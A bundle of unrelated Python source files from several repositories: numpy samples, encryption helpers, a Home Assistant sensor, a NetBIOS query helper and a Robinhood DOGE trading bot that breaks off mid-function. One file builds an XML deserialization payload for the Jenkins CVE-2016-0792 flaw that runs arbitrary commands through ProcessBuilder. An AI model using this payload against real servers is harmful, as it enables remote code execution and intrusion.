#### File: numpy-stack-samples/numpy/matrix-dot-speed.py ```python import numpy as np from datetime import datetime # note: you can also use %timeit a = np.random.randn(100) b = np.random.randn(100) T = 100000 def slow_dot_product(a, b): result = 0 for e, f in zip(a, b): result += e*f return result t0 = datetime.now() for t in range(T): slow_dot_product(a, b) dt1 = datetime.now() - t0 t0 = datetime.now() for t in range(T): a.dot(b) dt2 = datetime.now() - t0 print("Time for slow method:", dt1.total_seconds()) print("Time for fast method:", dt2.total_seconds()) print("(slow / fast) Factor:", dt1.total_seconds() / dt2.total_seconds()) ``` #### File: numpy-stack-samples/pandas/donut-dataset.py ```python import numpy as np import pandas as pd import matplotlib.pyplot as plot # Function to generate datapoints def create_donut(radius, size): # assume that arr is in polar coordinates arr = np.array([np.linspace(0, 2 * np.pi, size), np.random.randn(size)]).T + radius cartesian_arr = np.array([arr[:, 1] * np.cos(arr[:, 0]), arr[:, 1] * np.sin(arr[:, 0])]).T return cartesian_arr # Function to square values def square_x1(row): return float(row['x1']**2) # select only the year, 0th element in this case def square_x2(row): return float(row['x2']**2) # select only the year, 0th element in this case # Function to multiply values def multiply_x1x2(row): return float(row['x1'] * row['x2']) # select only the year, 0th element in this case # Generate numpy arrays outerCircle = create_donut(10, 5000) innerCircle = create_donut(5, 5000) # Outer donut dataframe dfo = pd.DataFrame(outerCircle, columns=["x1", "x2"]) dfo["y"] = 1 # Inner donut dataframe dfi = pd.DataFrame(innerCircle, columns=["x1", "x2"]) dfi["y"] = 0 # Generate DataFrame for result csv df = pd.concat([dfi, dfo], ignore_index=True) # Apply quadratic feature expansion df["x1^2"] = df.apply(square_x1, axis=1) df["x2^2"] = df.apply(square_x2, axis=1) df["x1*x2"] = df.apply(multiply_x1x2, axis=1) # Rearrange columns df = df[["x1", "x2", "x1^2", "x2^2", "x1*x2", "y"]] # (Optional) Shuffle to mix up "y" values # df = df.sample(frac=1.0) # Export to CSV df.to_csv("result.csv", header=True, index=False) # Plot ax = dfo.plot(x=0, y=1, kind="scatter", color="blue") dfi.plot(x=0, y=1, kind="scatter", color="red", ax=ax, figsize=(15, 15), legend=False) plot.show() ```
{ "source": "0x0000002A/eth_spider", "score": 3 }
#### File: eth_spider/utils/filter.py ```python import json import os import settings #todo move to file*.py class FilterAppendRule(object): # decoder encoder todo # switch selector/parser automatically todo def json_dict_parse(self, string): #from json to dict return json.loads(string) def dict_selector(self, current_dict, element_list): selected_dict = dict if len(element_list) != 0: selected_dict = dict((key, current_dict[key]) for key in element_list if key in current_dict) current_dict = selected_dict return selected_dict def html_selector(self, html, elements): pass def dict_value_to_string_parse(self,current_dict,sep=","): value_list = [] for key,value in current_dict.items(): value_list.append(value) return sep.join(value_list) def dict_key_to_string_parse(self,current_dict,sep=","): key_list = [] for key,value in current_dict.items(): key_list.append(key) return sep.join(key_list) class ImplFilter: def __init__(self, content): self.append_rule = FilterAppendRule #input content self.content_raw = content self.selected_elements = [] def eth_api_reponse_filter(self): # todo to create a eth_api layer self.content_dict = self.append_rule.json_dict_parse(self.append_rule, self.content_raw) self.append_rule.dict_selector(self.append_rule, self.content_dict, ["result"]) # todo should be adaptable for multiple types of "result" self.content_result_list = self.content_dict["result"] if type(self.content_result_list) != list: pass #exception if type(self.content_result_list[0]) != dict: pass # raise "error" for line in self.content_result_list: self.append_rule.dict_selector(self.append_rule, line, self.selected_elements) def eth_api_response_storage_filter(self): # todo move to filter combining the file/storage type if type(self.content_result_list) != list: pass #exception if type(self.content_result_list[0]) != dict: pass # raise "error" # todo combining file type self.file_content = "" line = "" header = "" if len(self.content_result_list) > 0: header = self.append_rule.dict_key_to_string_parse(self.append_rule, self.content_result_list[0]) for line_dict in self.content_result_list: line = self.append_rule.dict_value_to_string_parse(self.append_rule, line_dict) self.file_content = self.file_content + line + settings.LINESEP self.file_content = header + settings.LINESEP + self.file_content ```
{ "source": "0x00-0x00/jenkins-cve-2016-0792", "score": 3 }
#### File: 0x00-0x00/jenkins-cve-2016-0792/prepare_payload.py ```python def prepare_payload(command): splitCommand = command.split() preparedCommands = '' for entry in splitCommand: preparedCommands += f'<string>{entry}</string>' xml = f''' <map> <entry> <groovy.util.Expando> <expandoProperties> <entry> <string>hashCode</string> <org.codehaus.groovy.runtime.MethodClosure> <delegate class="groovy.util.Expando"/> <owner class="java.lang.ProcessBuilder"> <command>{preparedCommands}</command> </owner> <method>start</method> </org.codehaus.groovy.runtime.MethodClosure> </entry> </expandoProperties> </groovy.util.Expando> <int>1</int> </entry> </map>''' return xml ```
{ "source": "0x00-0x00/netbruter", "score": 3 }
#### File: netbruter/src/netbios.py ```python from nmb.NetBIOSProtocol import NBNSProtocol, NetBIOSTimeout class NetBiosDiscovery(object): def __init__(self, address, port=137): self.ip = address self.port = port self.nbns = NBNSProtocol() def start(self): try: # Try to reach the server response = self.nbns.queryIPForName(self.ip, port=self.port, \ timeout=30) except NetBIOSTimeout: print("[!] Error: NetBIOS Name Service response timed out.") return False return response ```
{ "source": "0x00-0x00/shellcoding", "score": 3 }
#### File: 0x00-0x00/shellcoding/project_setup.py ```python import sys # Default file with project data default_file = "project.data" # setup.py data setup_data = """from setuptools import setup setup(name='%s', version='%s', description='%s', url='%s', author='%s', author_email='%s', license='%s', packages=['%s'], package_dir={'%s': 'src'}, package_data={'%s': ['src/*']}, scripts=%s, zip_safe=False) """ def parse_data(f): data = dict() # Open the file and get the uncommented data with open(f, "r") as f: for line in f.readlines(): if line[0] is "#" or len(line) < 2: # Ignore comments continue key, value = line.split("=") data[key] = str(value.replace("\n", "")).replace('"', "'") return data def validate_data(data): REQUIRED_OPTIONS = [ "PROJECT_NAME", "PROJECT_VERSION", "PROJECT_AUTHOR", ] for k in data: v = data[k] # Check for empty data of required fields. if v is "" and k in REQUIRED_OPTIONS: print("[*] Validation error: {0} is empty.".format(k)) sys.exit(-1) elif v is "": print("[+] Setting value of key '{0}' to 'None'".format(k)) data[k] = "None" return data def main(): p = validate_data(parse_data(default_file)) print(setup_data % ( p["PROJECT_NAME"], p["PROJECT_VERSION"], p["PROJECT_DESCRIPTION"], p["PROJECT_URL"], p["PROJECT_AUTHOR"], p["AUTHOR_EMAIL"], p["PROJECT_LICENSE"], p["PROJECT_PACKAGE"], p["PROJECT_PACKAGE"], p["PROJECT_PACKAGE"], p["PROJECT_BINARIES"], )) return 0 if __name__ == "__main__": main() ``` #### File: shellcoding/src/hexdecode.py ```python class HexDecode(object): def __init__(self, data): self.data = self._format_data(data) @staticmethod def _format_data(data): data = data.replace("0x", "") return data def _convert(self): hex_out = list() for i in range(0, len(self.data), 2): hex_out.append(int(self.data[i: i+2], 16)) return ''.join([chr(x) for x in hex_out])[::-1] ```
{ "source": "0x00-0x00/shemutils", "score": 3 }
#### File: shemutils/src/encryption.py ```python import os import time import random import hashlib import getpass import sys import struct import rsa import multiprocessing from Crypto.Cipher import AES from shemutils.logger import Logger class Key(object): """ Class Key written by shemhazai This method generates a random key, unencoded or encoded in base64. """ def __init__(self, bits): self.key_size = bits if self._parse_bits() != 0: self.key = None else: self.key = self._generate_key() def _parse_bits(self): """Parse if the input int is divisible by 2""" if self.key_size % 2 != 0: return -1 return 0 def _generate_key(self): """Generate random bytes and join them into a single string""" return ''.join(chr(random.randint(0, 0xFF)) for i in range(self.key_size)) def get(self, encoded=False): """ Method for returning the generated key :param encoded: Boolean :return: key string """ if encoded is True: return base64.b64encode(self.key) return self.key class Encryption: """This module uses pycrypto for AES encryption""" def __init__(self): pass @staticmethod def create_iv(): iv = os.urandom(16) return iv @staticmethod def hash256(string): if type(string) is str: return hashlib.sha256(string.encode()).digest() else: return hashlib.sha256(string).digest() @staticmethod def hash512(string): if type(string) is str: return hashlib.sha512(string.encode()).digest() else: return hashlib.sha512(string).digest() @staticmethod def hashmd5(string): if type(string) is str: return hashlib.md5(string.encode()).digest() else: return hashlib.md5(string).digest() @staticmethod def get_key(bits=256): sys.stderr.write("Bit-size selected: %d\n" % bits) k = str() c = str("c") while k != c: if k == c: break k = getpass.getpass("Type your key: ", sys.stderr) c = getpass.getpass("Confirm your key: ", sys.stderr) if bits == 256: sys.stderr.write("Generating 256-bit key ...\n") return Encryption.hash256(k) elif bits == 128: sys.stderr.write("Generating 128-bit key ...\n") return Encryption.hashmd5(k) @staticmethod def encrypt_file(file_name, key, iv, output=None, chunksize=64*1024): if not output: dire_name = os.path.dirname(file_name) base_name = os.path.basename(file_name) if dire_name != "": output = dire_name + os.sep + base_name + ".enc" else: output = base_name + ".enc" filesize = os.path.getsize(file_name) encryptor = AES.new(key, AES.MODE_CBC, iv) with open(file_name, "rb") as infile: with open(output, "wb") as outfile: outfile.write(struct.pack("<Q", filesize)) outfile.write(iv) while True: chunk = infile.read(chunksize) if len(chunk) == 0: break elif len(chunk) % 16 != 0: chunk += " ".encode() * (16 - len(chunk) % 16) outfile.write(encryptor.encrypt(chunk)) return True @staticmethod def decrypt_file(file_name, key, output=None, chunksize=64*1024): if not output: root_name, ext = os.path.splitext(file_name) if ext != ".enc": return False dir_name = os.path.dirname(root_name) + os.sep f_name = os.path.basename(root_name) if dir_name != "/": output = dir_name + f_name else: output = f_name with open(file_name, "rb") as infile: origsize = struct.unpack("<Q", infile.read(struct.calcsize('Q')))[0] iv = infile.read(16) decryptor = AES.new(key, AES.MODE_CBC, iv) with open(output, "wb") as outfile: while True: chunk = infile.read(chunksize) if len(chunk) == 0: break outfile.write(decryptor.decrypt(chunk)) outfile.truncate(origsize) return True @staticmethod def get_chunk(msg, index, chunksize=16): return msg[index:index+chunksize] @staticmethod def split_string(string, chunksize=16): output = [] for x in range(0, len(string), chunksize): part = Encryption.get_chunk(string, x, chunksize=chunksize) if len(part) % 16 != 0: part += " " * (16 - len(part) % 16) output.append(part) return output @staticmethod def encrypt_message(plaintext, key, iv): """ Function to encrypt a plaintext message. Also checks if IV length is correct. """ psize = sys.getsizeof(plaintext) if len(iv) != 16: return "Error: Invalid IV size." encryptor = AES.new(key, AES.MODE_CBC, iv) cipher = bytes() cipher += struct.pack("<Q", psize) cipher += iv for chunk in Encryption.split_string(plaintext): cipher += encryptor.encrypt(chunk) return cipher @staticmethod def decrypt_message(cipher, key): """ Function to decrypt data from input. Also checks if IV length is correct. """ iv = cipher[struct.calcsize("Q"):struct.calcsize("3Q")] if len(iv) != 16: return "Error: Invalid IV size." decryptor = AES.new(key, AES.MODE_CBC, iv) plaintext = str() for chunk in Encryption.split_string(cipher[struct.calcsize("3Q"):]): plaintext += decryptor.decrypt(chunk).decode() return plaintext class RSA: """This class have dependencies. multiprocessing, rsa modules are needed. """ def __init__(self): self.logger = Logger("RSA") self.public_key = None self.private_key = None self.cpu_count = multiprocessing.cpu_count() def generate_keypair(self, bits=4096, v=True): if v is not False: self.logger.info("Generating new %d-bits key pair ..." % bits) t1 = time.time() self.public_key, self.private_key = rsa.newkeys(bits, poolsize=self.cpu_count) t2 = time.time() if v is not False: self.logger.info("Key pair generation took {0} seconds.".format(t2-t1)) return True def encrypt_message(self, message, v=False): """ :param message: string :param v: boolean # stands for verbose :return: """ if v is not False: self.logger.info("Encrypting message ...") s1 = time.time() crypto = rsa.encrypt(message, self.public_key) s2 = time.time() if v is not False: self.logger.info("Encryption success.") self.logger.info("Procedure took {0} seconds.".format(s2-s1)) return crypto def decrypt_message(self, cipher, v=False): if v is not False: self.logger.info("Decrypting cipher ...") s1 = time.time() decrypto = rsa.decrypt(cipher, self.private_key) s2 = time.time() if v is not False: self.logger.info("Decryption success.") self.logger.info("Procedure took %d seconds." % (s2 - s1)) return decrypto def save_keys(self, priv_f="private_key.pem", pub_f="public_key.pem", v=False): if self.public_key is None: self.logger.error("Public Key does not exists. Generate it.") return False if self.private_key is None: self.logger.error("Private Key does not exists. Generate it.") return False with open(priv_f, "w") as priv: priv.write(self.private_key.save_pkcs1().decode()) self.logger.info("Private key saved to file '%s'" % priv_f) with open(pub_f, "w") as pub: pub.write(self.public_key.save_pkcs1().decode()) if v is True: self.logger.info("Public key saved to file '%s" % pub_f) return True def load_keys(self, priv_f, pub_f, v=False): if not os.path.isfile(priv_f): self.logger.error("Private key file does not exists.") if not os.path.isfile(pub_f): self.logger.error("Public key file does not exists.") with open(priv_f, "rb") as priv: priv_data = priv.read() with open(pub_f, "rb") as pub: pub_data = pub.read() self.private_key = rsa.PrivateKey.load_pkcs1(priv_data) self.public_key = rsa.PublicKey.load_pkcs1(pub_data) if v is True: self.logger.info("Key pair successfully loaded.") return True ```
{ "source": "0x00-0xFF/home-assistant", "score": 2 }
#### File: components/dsmr_reader/sensor.py ```python import logging from homeassistant.components import mqtt from homeassistant.core import callback from homeassistant.helpers.entity import Entity from homeassistant.util import slugify from .definitions import DEFINITIONS _LOGGER = logging.getLogger(__name__) DOMAIN = "dsmr_reader" async def async_setup_platform(hass, config, async_add_entities, discovery_info=None): """Set up DSMR Reader sensors.""" sensors = [] for topic in DEFINITIONS: sensors.append(DSMRSensor(topic)) async_add_entities(sensors) class DSMRSensor(Entity): """Representation of a DSMR sensor that is updated via MQTT.""" def __init__(self, topic): """Initialize the sensor.""" self._definition = DEFINITIONS[topic] self._entity_id = slugify(topic.replace("/", "_")) self._topic = topic self._name = self._definition["name"] self._unit_of_measurement = ( self._definition["unit"] if "unit" in self._definition else "" ) self._icon = self._definition["icon"] if "icon" in self._definition else None self._transform = ( self._definition["transform"] if "transform" in self._definition else None ) self._state = None async def async_added_to_hass(self): """Subscribe to MQTT events.""" @callback def message_received(message): """Handle new MQTT messages.""" if self._transform is not None: self._state = self._transform(message.payload) else: self._state = message.payload self.async_schedule_update_ha_state() return await mqtt.async_subscribe(self.hass, self._topic, message_received, 1) @property def name(self): """Return the name of the sensor supplied in constructor.""" return self._name @property def entity_id(self): """Return the entity ID for this sensor.""" return f"sensor.{self._entity_id}" @property def state(self): """Return the current state of the entity.""" return self._state @property def unit_of_measurement(self): """Return the unit_of_measurement of this sensor.""" return self._unit_of_measurement @property def icon(self): """Return the icon of this sensor.""" return self._icon ```
{ "source": "0x006E/twweet-cli", "score": 3 }
#### File: twweet_cli/config/ConfigReader.py ```python import yaml import os from os.path import expanduser home = expanduser("~") class ConfigurationReader(object): __tweets = None __hashtag = None def __init__(self): ymlfile = home + '/.twweet-cli/data/config.yml' if os.path.isfile(ymlfile): with open(ymlfile, 'r') as file: cfg = yaml.load(file) ConfigurationReader.__tweets = cfg['Tweets'] ConfigurationReader.__hashtag = cfg['HashTag'] else: if not os.path.exists(home + '/.twweet-cli/data'): os.makedirs(home + '/.twweet-cli/data') with open(home + '/.twweet-cli/data/config.yml', 'w') as ymlfile: ymlLine1 = "#Depending on the system(Windows or Linux) change the\ backward or forward slash appropriately." ymlLine2 = "Tweets: /TweetsStore/" ymlLine3 = "HashTag: /HashTagStore/" ymlfile.write("%s\n%s\n%s\n" % (ymlLine1, ymlLine2, ymlLine3)) @staticmethod def get_tweets_storage(): return ConfigurationReader.__tweets @staticmethod def get_hashtag_storage(): return ConfigurationReader.__hashtag ```
{ "source": "0x00b1/napari", "score": 3 }
#### File: napari/utils/notebook_display.py ```python import base64 from io import BytesIO __all__ = ['nbscreenshot'] class NotebookScreenshot: """Display napari screenshot in the jupyter notebook. Functions returning an object with a _repr_png_() method will displayed as a rich image in the jupyter notebook. https://ipython.readthedocs.io/en/stable/api/generated/IPython.display.html Parameters ---------- viewer : napari.Viewer The napari viewer. canvas_only : bool, optional If True includes the napari viewer frame in the screenshot, otherwise just includes the canvas. By default, True. Examples -------- ``` import napari from napari.utils import nbscreenshot from skimage.data import chelsea viewer = napari.view_image(chelsea(), name='chelsea-the-cat') nbscreenshot(viewer) # screenshot just the canvas with the napari viewer framing it nbscreenshot(viewer, canvas_only=False) ``` """ def __init__(self, viewer, *, canvas_only=False): """Initialize screenshot object. Parameters ---------- viewer : napari.Viewer The napari viewer canvas_only : bool, optional If False include the napari viewer frame in the screenshot, and if True then take screenshot of just the image display canvas. By default, False. """ self.viewer = viewer self.canvas_only = canvas_only self.image = None def _repr_png_(self): """PNG representation of the viewer object for IPython. Returns ------- In memory binary stream containing PNG screenshot image. """ from imageio import imsave from .._qt.qt_event_loop import get_app get_app().processEvents() self.image = self.viewer.screenshot(canvas_only=self.canvas_only) with BytesIO() as file_obj: imsave(file_obj, self.image, format='png') file_obj.seek(0) png = file_obj.read() return png def _repr_html_(self): png = self._repr_png_() url = 'data:image/png;base64,' + base64.b64encode(png).decode('utf-8') html = f'<img src="{url}"></img>' return html nbscreenshot = NotebookScreenshot ``` #### File: napari/tools/test_strings.py ```python import ast import os import tokenize from pathlib import Path from types import ModuleType from typing import Dict, List, Optional, Set, Tuple import pytest from strings_list import ( SKIP_FILES, SKIP_FOLDERS, SKIP_WORDS, SKIP_WORDS_GLOBAL, ) REPO_ROOT = Path(__file__).resolve() NAPARI_MODULE = (REPO_ROOT / "napari").relative_to(REPO_ROOT) # Types StringIssuesDict = Dict[str, List[Tuple[int, str]]] OutdatedStringsDict = Dict[str, List[str]] TranslationErrorsDict = Dict[str, List[Tuple[str, str]]] class FindTransStrings(ast.NodeVisitor): """This node visitor finds translated strings.""" def __init__(self): super().__init__() self._found = set() self._trans_errors = [] def _check_vars(self, method_name, args, kwargs): """Find interpolation variables inside a translation string. This helps find any variables that need to be interpolated inside a string so we can check against the `kwargs` for both singular and plural strings (if present) inside `args`. Parameters ---------- method_name : str Translation method used. Options include "_", "_n", "_p" and "_np". args : list List of arguments passed to translation method. kwargs : kwargs List of keyword arguments passed to translation method. """ singular_kwargs = set(kwargs) - set({"n"}) plural_kwargs = set(kwargs) # If using trans methods with `context`, remove it since we are # only interested in the singular and plural strings (if any) if method_name in ["_p", "_np"]: args = args[1:] # Iterate on strings passed to the trans method. Could be just a # singular string or a singular and a plural. We use the index to # determine which one is used. for idx, arg in enumerate(args): found_vars = set() check_arg = arg[:] check_kwargs = {} while True: try: check_arg.format(**check_kwargs) except KeyError as err: key = err.args[0] found_vars.add(key) check_kwargs[key] = 0 continue break if idx == 0: check_1 = singular_kwargs - found_vars check_2 = found_vars - singular_kwargs else: check_1 = plural_kwargs - found_vars check_2 = found_vars - plural_kwargs if check_1 or check_2: error = (arg, check_1.union(check_2)) self._trans_errors.append(error) def visit_Call(self, node): method_name, args, kwargs = "", [], [] try: if node.func.value.id == "trans": method_name = node.func.attr # Args args = [] for item in [arg.value for arg in node.args]: args.append(item) self._found.add(item) # Kwargs kwargs = [] for item in [kw.arg for kw in node.keywords]: if item != "deferred": kwargs.append(item) except Exception: pass if method_name: self._check_vars(method_name, args, kwargs) self.generic_visit(node) def reset(self): """Reset variables storing found strings and translation errors.""" self._found = set() self._trans_errors = [] show_trans_strings = FindTransStrings() def _find_func_definitions( node: ast.AST, defs: List[ast.FunctionDef] = [] ) -> List[ast.FunctionDef]: """Find all functions definition recrusively. This also find functions nested inside other functions. Parameters ---------- node : ast.Node The initial node of the ast. defs : list of ast.FunctionDef A list of function definitions to accumulate. Returns ------- list of ast.FunctionDef Function definitions found in `node`. """ try: body = node.body except Exception: body = [] for node in body: _find_func_definitions(node, defs=defs) if isinstance(node, ast.FunctionDef): defs.append(node) return defs def find_files( path: str, skip_folders: tuple, skip_files: tuple, extensions: tuple = (".py",), ) -> List[str]: """Find recursively all files in path. Parameters ---------- path : str Path to a folder to find files in. skip_folders : tuple Skip folders containing folder to skip skip_files : tuple Skip files. extensions : tuple, optional Extensions to filter by. Default is (".py", ) Returns ------- list Sorted list of found files. """ found_files = [] for root, _dirs, files in os.walk(path, topdown=False): for filename in files: fpath = os.path.join(root, filename) if any(folder in fpath for folder in skip_folders): continue if fpath in skip_files: continue if filename.endswith(extensions): found_files.append(fpath) return list(sorted(found_files)) def find_docstrings(fpath: str) -> Dict[str, str]: """Find all docstrings in file path. Parameters ---------- fpath : str File path. Returns ------- dict Simplified string as keys and the value is the original docstring found. """ with open(fpath) as fh: data = fh.read() module = ast.parse(data) docstrings = [] function_definitions = _find_func_definitions(module) docstrings.extend([ast.get_docstring(f) for f in function_definitions]) class_definitions = [ node for node in module.body if isinstance(node, ast.ClassDef) ] docstrings.extend([ast.get_docstring(f) for f in class_definitions]) method_definitions = [] for class_def in class_definitions: method_definitions.extend( [ node for node in class_def.body if isinstance(node, ast.FunctionDef) ] ) docstrings.extend([ast.get_docstring(f) for f in method_definitions]) docstrings.append(ast.get_docstring(module)) docstrings = [doc for doc in docstrings if doc] results = {} for doc in docstrings: key = " ".join([it for it in doc.split() if it != ""]) results[key] = doc return results def find_strings(fpath: str) -> Dict[Tuple[int, str], Tuple[int, str]]: """Find all strings (and f-strings) for the given file. Parameters ---------- fpath : str File path. Returns ------- dict A dict with a tuple for key and a tuple for value. The tuple contains the line number and the stripped string. The value containes the line number and the original string. """ strings = {} with open(fpath) as f: for toktype, tokstr, (lineno, _), _, _ in tokenize.generate_tokens( f.readline ): if toktype == tokenize.STRING: try: string = eval(tokstr) except Exception: string = eval(tokstr[1:]) if isinstance(string, str): key = " ".join([it for it in string.split() if it != ""]) strings[(lineno, key)] = (lineno, string) return strings def find_trans_strings( fpath: str, ) -> Tuple[Dict[str, str], List[Tuple[str, Set[str]]]]: """Find all translation strings for the given file. Parameters ---------- fpath : str File path. Returns ------- tuple The first item is a dict with a stripped string as key and the orginal string for value. The second item is a list of tuples that includes errors in translations. """ with open(fpath) as fh: data = fh.read() module = ast.parse(data) trans_strings = {} show_trans_strings.visit(module) for string in show_trans_strings._found: key = " ".join([it for it in string.split()]) trans_strings[key] = string errors = list(show_trans_strings._trans_errors) show_trans_strings.reset() return trans_strings, errors def import_module_by_path(fpath: str) -> Optional[ModuleType]: """Import a module given py a path. Parameters ---------- fpath : str The path to the file to import as module. Returns ------- ModuleType or None The imported module or `None`. """ import importlib.util fpath = fpath.replace("\\", "/") module_name = fpath.replace(".py", "").replace("/", ".") try: spec = importlib.util.spec_from_file_location(module_name, fpath) module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) except Exception: module = None return module def find_issues( paths: List[str], skip_words: List[str] ) -> Tuple[StringIssuesDict, OutdatedStringsDict, TranslationErrorsDict]: """Find strings that have not been translated, and errors in translations. This will not raise errors but return a list with found issues wo they can be fixed at once. Parameters ---------- paths : list of str List of paths to files to check. skip_words : list of str List of words that should be skipped inside the given file. Returns ------- tuple The first item is a dictionary of the list of issues found per path. Each issue is a tuple with line number and the untranslated string. The second item is a dictionary of files that contain outdated skipped strings. The third item is a dictionary of the translation errors found per path. Translation errors referes to missing interpolation variables, or spelling errors of the `deferred` keyword. """ issues = {} outdated_strings = {} trans_errors = {} for fpath in paths: issues[fpath] = [] strings = find_strings(fpath) trans_strings, errors = find_trans_strings(fpath) doc_strings = find_docstrings(fpath) skip_words_for_file = skip_words.get(fpath, []) skip_words_for_file_check = skip_words_for_file[:] module = import_module_by_path(fpath) try: __all__strings = module.__all__ except Exception: __all__strings = [] for key in strings: _lineno, string = key _lineno, value = strings[key] if ( string not in doc_strings and string not in trans_strings and value not in skip_words_for_file and value not in __all__strings and string != "" and string.strip() != "" and value not in SKIP_WORDS_GLOBAL ): issues[fpath].append((_lineno, value)) elif value in skip_words_for_file_check: skip_words_for_file_check.remove(value) if skip_words_for_file_check: outdated_strings[fpath] = skip_words_for_file_check if errors: trans_errors[fpath] = errors if not issues[fpath]: issues.pop(fpath) return issues, outdated_strings, trans_errors # --- Fixture # ---------------------------------------------------------------------------- @pytest.fixture(scope="module") def checks(): paths = find_files(NAPARI_MODULE, SKIP_FOLDERS, SKIP_FILES) issues, outdated_strings, trans_errors = find_issues(paths, SKIP_WORDS) return issues, outdated_strings, trans_errors # --- Tests # ---------------------------------------------------------------------------- def test_missing_translations(checks): issues, _, _ = checks print( "\nSome strings on the following files might need to be translated " "or added to the skip list.\nSkip list is located at " "`tools/strings_list.py` file.\n\n" ) for fpath, values in issues.items(): print(f"{fpath}\n{'*' * len(fpath)}") unique_values = set() for line, value in values: unique_values.add(value) print(f"{line}:\t{repr(value)}") print("\n") if fpath in SKIP_WORDS: print( "List below can be copied directly to `tools/strings_list.py` file inside the '{fpath}' key:\n" ) for value in sorted(unique_values): print(f" {repr(value)},") else: print( "List below can be copied directly to `tools/strings_list.py` file:\n" ) print(f" {repr(fpath)}: [") for value in sorted(unique_values): print(f" {repr(value)},") print(" ],") print("\n") no_issues = not issues assert no_issues def test_outdated_string_skips(checks): _, outdated_strings, _ = checks print( "\nSome strings on the skip list on the `tools/strings_list.py` are " "outdated.\nPlease remove them from the skip list.\n\n" ) for fpath, values in outdated_strings.items(): print(f"{fpath}\n{'*' * len(fpath)}") print(", ".join(repr(value) for value in values)) print("") no_outdated_strings = not outdated_strings assert no_outdated_strings def test_translation_errors(checks): _, _, trans_errors = checks print( "\nThe following translation strings do not provide some " "interpolation variables:\n\n" ) for fpath, errors in trans_errors.items(): print(f"{fpath}\n{'*' * len(fpath)}") for string, variables in errors: print(f"String:\t\t{repr(string)}") print( f"Variables:\t{', '.join(repr(value) for value in variables)}" ) print("") print("") no_trans_errors = not trans_errors assert no_trans_errors ```
{ "source": "0x00C0DE/cs370-proj4-qr-totp", "score": 3 }
#### File: 0x00C0DE/cs370-proj4-qr-totp/leebrad-MP4.py ```python import os import sys import pyqrcode import getpass import random import base64 import hmac import string import hashlib import time import math import struct import array # function to generate qr code svg def create_qrcode(): #creates user id username = 'braden.lee96' user_email = username + "@gmail.com" #print(user_email) # static secret to make testing purposes easier secret = base64.b32encode(bytearray("BIGONEBUYNOWSAVE", "ascii")).decode('utf-8')[:-6] #print(secret) # Uri format #url = 'otpauth://totp/' + '0x00C0DE' + ':' + user_email + '?secret=' + secret + '&issuer=' + '0x00C0DE' url = 'otpauth://totp/' + 'smallmediumpizza' + ':' + user_email + '?secret=' + secret + '&issuer=' + 'smallmediumpiza' #print(url) # function to actually generate the qr url_qrcode = pyqrcode.create(url) # saves the qr as a svg image name "uri_qrcode.svg" url_qrcode.svg("uri_qrcode.svg", scale="8") return # function to generate totp def create_otp(): # epoch time c_timer = math.floor(time.time()) # couter variable for 30 seconds steps_thirty = 30 Time_counter = int((c_timer/steps_thirty)) t_c = Time_counter #print("timer counter:", Time_counter) # convert time to bytes byte_arr = array.array('B') for i in reversed(range(0, 8)): # (AND) with 1111 1111 to leave the last 8 bits byte_arr.insert(0, t_c & 0b11111111) # perform bit shift by 8 places t_c >>= 8 # Time converted to bytes Time_bytes = byte_arr #print("Time_bytes: ", Time_bytes) # static secret to bytes secret = bytearray("BIGONEBUYNOWSAVE", "ascii") # hmac generation qr_otp = hmac.new(secret, Time_bytes, hashlib.sha1).hexdigest() # convert to binary and take last 4 bits to use as the offset(int) bitstring = bin(int(qr_otp, 16)) last_4_bits = bitstring[-4:] qr_offset = int(last_4_bits, 2) # grabs the next 31 bits needed using (AND) with bitmask 01111111 11111111 11111111 11111111 binary_otp = int(qr_otp[(qr_offset * 2):((qr_offset * 2) + 8)], 16) & 0b01111111111111111111111111111111 # takes the last 6 digits as totp dig_6 = str(binary_otp) dig_6 = dig_6[-6:] print("dig_6 is: ", dig_6) return # arg checker if len(sys.argv) == 1: print("[ERROR]") print("not enough args.lol") print("[ERROR]") else: first_arg = sys.argv[1] print("first arg is:", first_arg) if first_arg == '--generate-qr': print("in [generate qr]") create_qrcode() if first_arg == "--get-otp": print("in [get otp]") create_otp() print("done") ```
{ "source": "0x00C0DE/robinhood_crypto_bot", "score": 3 }
#### File: 0x00C0DE/robinhood_crypto_bot/rh_DOGE_bot_2021_v1.py ```python import robin_stocks import math import pyotp import sched import time import sys # Program description: # A Robinhood bot created to automatically monitor and trade crypto currency currently supported by Robinhood. # Works specifically for DOGE. # # This bot runs a scheduler every 5 minutes in order to update the prices on a 5 minute interval for a # list that will hold the previous prices for 30 minutes. # # This bot [REQUIRES] a individual to already have SET amount of shares of the current crypto they want to trade. # # Instructions after entering in login information (no particular order): # # 1. Fill in ticker (since this bot is specifically for DOGE, should be left alone) # 2. Fill in average_cost # 3. Fill in Shares2Buy amount (in dollars $) # 4. Fill in Shares2Sell amount (in dollars $) # 5. Fill in num_shares # # Some buying and selling errors will occur if a individual does not have enough shares to sell or enough money to buy. # If errors occur, simply re-update through redoing instructions above and restart the program. # Robinhood.login(username="example72", password="<PASSWORD>") totp = pyotp.TOTP("Sauce").now() login = robin_stocks.login("", "") # Scheduler created to run every 5 mins s = sched.scheduler(time.time, time.sleep) # 5 min interval price history list, for every 30 minutes SE3P = [] Mazda = [] counter1 = 1.0 counter2 = 1.0 Shares2Sell = 0.00 Shares2Buy = 0.00 # step (5) # number of shares based on (total cost / Shares2Buy) # EX: ($2940 / 20) = 147 num_shares = 147 # step (2) # average cost average_cost = 0.363 def run(sc): # crypto currency ticker available on robinhood ticker = "DOGE" global SE3P global Mazda global Shares2Sell global Shares2Buy global counter1 global counter2 global average_cost global num_shares r = robin_stocks.crypto.get_crypto_quote(ticker, info="mark_price") #r = robin_stocks.robinhood.get_latest_price(ticker) print(ticker + ": $" + str(r)) SE3P.append(r) if len(SE3P) > 6: # if there are 5 or more elements in the list, rearrange positions Mazda = SE3P[1:6] SE3P = SE3P[-1:] SE3P = Mazda + SE3P print("Cleared and repositioned") if len(SE3P) == 1: #0min print("appended SE3P[0]") print(SE3P) elif len(SE3P) == 2: #SE3P.append(r) #5min print("appended SE3P[1]") print(SE3P) elif len(SE3P) == 3: #SE3P.append(r) #10min print("appended SE3P[2]") print(SE3P) elif len(SE3P) == 4: #SE3P.append(r) #15min print("appended SE3P[3]") print(SE3P) elif len(SE3P) == 5: #SE3P.append(r) #20min print("appended SE3P[4]") print(SE3P) elif len(SE3P) == 6: #SE3P.append(r) #25min print("appended SE3P[5]") print(SE3P) # BUY # if it's been less than 30 minutes since the start of the program if counter1 < 6: # For each 5 minutes, compare the inital price at the start of the program to the current price. 